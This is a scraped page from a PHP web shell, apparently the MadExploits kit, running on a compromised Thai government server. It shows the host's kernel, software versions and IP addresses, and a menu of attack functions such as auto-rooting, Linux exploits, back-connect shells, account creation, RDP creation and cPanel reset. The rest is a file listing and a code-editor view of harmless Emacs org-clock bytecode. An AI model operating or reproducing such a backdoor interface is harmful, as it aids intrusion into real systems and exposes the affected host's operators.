Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
org /
[ HOME SHELL ]
Name
Size
Permission
Action
org-agenda.elc
214.7
KB
-rw-r--r--
org-archive.elc
11.75
KB
-rw-r--r--
org-attach.elc
14.21
KB
-rw-r--r--
org-bbdb.elc
7.37
KB
-rw-r--r--
org-bibtex.elc
4.13
KB
-rw-r--r--
org-clock.elc
35.05
KB
-rw-r--r--
org-colview.elc
41.45
KB
-rw-r--r--
org-compat.elc
7.48
KB
-rw-r--r--
org-exp.elc
149.66
KB
-rw-r--r--
org-export-latex.elc
44.23
KB
-rw-r--r--
org-faces.elc
20.18
KB
-rw-r--r--
org-footnote.elc
13.77
KB
-rw-r--r--
org-gnus.elc
5.74
KB
-rw-r--r--
org-id.elc
16.92
KB
-rw-r--r--
org-info.elc
1.68
KB
-rw-r--r--
org-install.elc
635
B
-rw-r--r--
org-irc.elc
5.89
KB
-rw-r--r--
org-jsinfo.elc
5.39
KB
-rw-r--r--
org-list.elc
32.5
KB
-rw-r--r--
org-mac-message.elc
2.27
KB
-rw-r--r--
org-macs.elc
7.83
KB
-rw-r--r--
org-mew.elc
2.92
KB
-rw-r--r--
org-mhe.elc
5.16
KB
-rw-r--r--
org-mouse.elc
32.83
KB
-rw-r--r--
org-plot.elc
10.28
KB
-rw-r--r--
org-publish.elc
20.43
KB
-rw-r--r--
org-remember.elc
31.7
KB
-rw-r--r--
org-rmail.elc
2.82
KB
-rw-r--r--
org-table.elc
136.62
KB
-rw-r--r--
org-timer.elc
7.61
KB
-rw-r--r--
org-vm.elc
2.91
KB
-rw-r--r--
org-w3m.elc
3.88
KB
-rw-r--r--
org-wl.elc
2.82
KB
-rw-r--r--
org.elc
505.8
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : org-clock.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:04:42 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/org/org-clock.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`org-clock.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; (byte-code "\300\301!\210\302\303\304\305\306\307\310\311&\207" [require org custom-declare-group org-clock nil "Options concerning clocking working time in Org-mode." :tag "Org Clock" :group org-progress] 8) #@344 Should clocking info be wrapped into a drawer? When t, clocking info will always be inserted into a :CLOCK: drawer. If necessary, the drawer will be created. When nil, the drawer will not be created, but used when present. When an integer and the number of clocking entries in an item reaches or exceeds this number, a drawer will be created. (custom-declare-variable 'org-clock-into-drawer '2 '(#$ . 824) :group 'org-todo :group 'org-clock :type '(choice (const :tag "Always" t) (const :tag "Only when drawer exists" nil) (integer :tag "When at least N clock entries"))) #@220 When non-nil, the clock will be stopped when the relevant entry is marked DONE. A nil value means, clock will keep running until stopped explicitly with `C-c C-x C-o', or until the clock is started in a different item. (custom-declare-variable 'org-clock-out-when-done 't '(#$ . 1403) :group 'org-clock :type 'boolean) #@71 Non-nil means, remove the clock line when the resulting time is zero. (custom-declare-variable 'org-clock-out-remove-zero-time-clocks 'nil '(#$ . 1728) :group 'org-clock :type 'boolean) #@252 Set task to a special todo state while clocking it. The value should be the state to which the entry should be switched. If the value is a function, it must take one parameter (the current TODO state of the item) and return the state to switch it to. (custom-declare-variable 'org-clock-in-switch-to-state 'nil '(#$ . 1921) :group 'org-clock :group 'org-todo :type '(choice (const :tag "Don't force a state" nil) (string :tag "State") (symbol :tag "Function"))) #@47 Number of clock tasks to remember in history. (custom-declare-variable 'org-clock-history-length '5 '(#$ . 2389) :group 'org-clock :type 'integer) #@202 When non-nil, should be a function to create `org-clock-heading'. This is the string shown in the mode line when a clock is running. The function is called with point at the beginning of the headline. (custom-declare-variable 'org-clock-heading-function 'nil '(#$ . 2543) :group 'org-clock :type 'function) #@67 Maximum length of clock strings in the modeline. 0 means no limit (custom-declare-variable 'org-clock-string-limit '0 '(#$ . 2856) :group 'org-clock :type 'integer) #@118 If non-nil, when clocking into a task with a clock entry which has not been closed, resume the clock from that point (custom-declare-variable 'org-clock-in-resume 'nil '(#$ . 3028) :group 'org-clock :type 'boolean) #@409 When non-nil, save the running clock when emacs is closed, and resume it next time emacs is started. When this is t, both the running clock, and the entire clock history are saved. When this is the symbol `clock', only the running clock is saved. When Emacs restarts with saved clock information, the file containing the running clock as well as all files mentioned in the clock history will be visited. (custom-declare-variable 'org-clock-persist 'nil '(#$ . 3250) :group 'org-clock :type '(choice (const :tag "Just the running clock" clock) (const :tag "Clock and history" t) (const :tag "No persistence" nil))) #@28 File to save clock data to (custom-declare-variable 'org-clock-persist-file '(convert-standard-filename "~/.emacs.d/org-clock-save.el") '(#$ . 3874) :group 'org-clock :type 'string) #@59 When non-nil, ask before saving the current clock on exit (custom-declare-variable 'org-clock-persist-query-save 'nil '(#$ . 4062) :group 'org-clock :type 'boolean) #@65 When non-nil, ask before resuming any stored clock during load. (custom-declare-variable 'org-clock-persist-query-resume 't '(#$ . 4233) :group 'org-clock :type 'boolean) (byte-code "\301B\302\301!\204 \303\301\304\"\210\305\301\306\307#\210\310B\302\310!\204$ \303\310\311\"\210\312B\302\312!\2043 \303\312\304\"\210\313B\302\313!\204B \303\313\304\"\210\314B\302\314!\204Q \303\314\304\"\210\311\207" [current-load-list org-mode-line-string default-boundp set-default "" put risky-local-variable t org-clock-mode-line-timer nil org-clock-heading org-clock-heading-for-remember org-clock-start-time] 4) #@50 List of marker pointing to recent clocked tasks. (defvar org-clock-history nil (#$ . 4854)) #@146 Marker pointing to the default task that should clock time. The clock can be made to switch to this task after clocking out of a different task. (defvar org-clock-default-task (make-marker) (#$ . 4953)) #@77 Marker pointing to the task that has been interrupted by the current clock. (defvar org-clock-interrupted-task (make-marker) (#$ . 5162)) (byte-code "\301B\302\301!\204 \303\301\304 \"\210\305 \306\307#\207" [current-load-list org-clock-mode-line-map default-boundp set-default make-sparse-keymap define-key [mode-line mouse-2] org-clock-goto] 4) #@37 Push a marker to the clock history. (defalias 'org-clock-history-push #[(&optional pos buffer) "\306\307^]\310 \206 `\n\223\311\211 \235\211\203&